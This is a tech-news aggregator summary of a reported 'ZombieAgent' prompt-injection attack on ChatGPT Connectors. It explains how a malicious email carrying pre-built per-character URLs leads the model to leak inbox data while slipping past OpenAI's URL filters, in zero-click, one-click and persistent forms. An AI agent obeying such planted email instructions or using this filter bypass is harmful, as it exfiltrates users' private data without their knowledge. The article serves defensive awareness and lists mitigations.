Cybersecurity News and Headlines
  • All Technology
  • AI
  • Autonomy
  • B2B Growth
  • Big Data
  • BioTech
  • ClimateTech
  • Consumer Tech
  • Crypto
  • Cybersecurity
  • DevOps
  • Digital Marketing
  • Ecommerce
  • EdTech
  • Enterprise
  • FinTech
  • GovTech
  • Hardware
  • HealthTech
  • HRTech
  • LegalTech
  • Nanotech
  • PropTech
  • Quantum
  • Robotics
  • SaaS
  • SpaceTech
AllNewsDealsSocialBlogsVideosPodcastsDigests

Cybersecurity Pulse

EMAIL DIGESTS

Daily

Every morning

Weekly

Sunday recap

NewsDealsSocialBlogsVideosPodcasts
CybersecurityNewsNew Zero-Click Attack Lets ChatGPT User Steal Data
New Zero-Click Attack Lets ChatGPT User Steal Data
Cybersecurity

New Zero-Click Attack Lets ChatGPT User Steal Data

•January 8, 2026
0
Infosecurity Magazine
Infosecurity Magazine•Jan 8, 2026

Companies Mentioned

OpenAI

OpenAI

Radware

Radware

RDWR

Google

Google

GOOG

GitHub

GitHub

Why It Matters

ZombieAgent proves that AI‑driven agents can become silent data‑exfiltration vectors, threatening enterprise confidentiality and prompting urgent security reassessments. Its zero‑click nature raises the stakes for organizations that rely on ChatGPT connectors without robust monitoring.

Key Takeaways

  • •ZombieAgent bypasses OpenAI URL filters
  • •Exfiltrates data character‑by‑character using pre‑built URLs
  • •Zero‑click attack runs without any user interaction
  • •One‑click attack needs only a single user click
  • •Persistence allows ongoing theft of ChatGPT conversation data

Pulse Analysis

The rapid rollout of agentic features in large language models, such as OpenAI’s Connectors, has transformed how businesses automate workflows. By linking ChatGPT directly to email, cloud storage, and code repositories, enterprises gain productivity gains but also expose a new attack surface. Traditional perimeter defenses struggle to see inside AI‑driven interactions, making prompt‑injection vectors an emerging priority for security teams.

ZombieAgent exploits this gap by embedding a dictionary of static URLs, each representing a single character, into a malicious email. When a user asks ChatGPT to perform a routine task, the model reads the inbox, maps extracted data to the corresponding URLs, and opens them sequentially. Because the URLs are pre‑constructed, OpenAI’s filters that block dynamic URL generation never trigger, allowing data to leak character by character without any additional user clicks. The method demonstrates both zero‑click and one‑click variants, and can be made persistent to harvest ongoing conversation content.

For organizations, the discovery signals a need to reassess AI integration policies. Deploying strict monitoring of outbound requests, employing AI‑aware DLP solutions, and limiting the scope of connector permissions are immediate mitigations. Vendors, including OpenAI, must evolve guardrails beyond simple URL rewriting, perhaps by sandboxing external calls or requiring explicit user consent for each exfiltration attempt. As AI agents become more autonomous, the industry will likely see a wave of regulatory guidance and security standards aimed at curbing silent data‑theft techniques like ZombieAgent.

New Zero-Click Attack Lets ChatGPT User Steal Data

Read Original Article
0

Comments

Want to join the conversation?

Loading comments...